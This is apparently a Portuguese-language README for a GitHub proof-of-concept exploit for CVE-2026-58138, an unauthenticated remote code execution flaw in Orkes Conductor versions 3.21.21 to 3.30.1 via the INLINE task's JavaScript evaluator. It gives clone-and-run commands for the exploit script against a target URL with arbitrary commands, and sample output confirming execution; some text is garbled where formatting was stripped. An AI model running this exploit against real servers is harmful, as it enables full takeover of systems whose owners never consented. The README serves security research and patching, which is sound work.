
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE não autenticado via avaliador INLINE GraalVM
Vulnerabilidade Crítica de Execução Remota de Código no Orkes Conductor
CVE-2026-58138 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada que afeta o Orkes Conductor nas versões 3.21.21 a 3.30.1. Esta vulnerabilidade permite que atacantes executem comandos arbitrários no servidor Conductor sem exigir qualquer autenticação, podendo levar ao comprometimento total do sistema.
A vulnerabilidade existe no tipo de tarefa INLINE no mecanismo de fluxo de trabalho do Orkes Conductor. A tarefa INLINE suporta avaliação de JavaScript com acesso a objetos Java via eval, permitindo que um atacante:
INLINE com código JavaScriptjava.lang.Runtime.exec()| Intervalo de Versões | Status |
|---|---|
| 3.21.21 - 3.30.1 | ✅ Vulnerável |
| > 3.30.1 | ❌ Corrigida |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 ou posteriorApenas para fins educacionais e de pesquisa em segurança. Use somente em sistemas que você possua ou para os quais tenha permissão explícita de teste.
⭐ Achou isto útil? Dê uma estrela no GitHub ⭐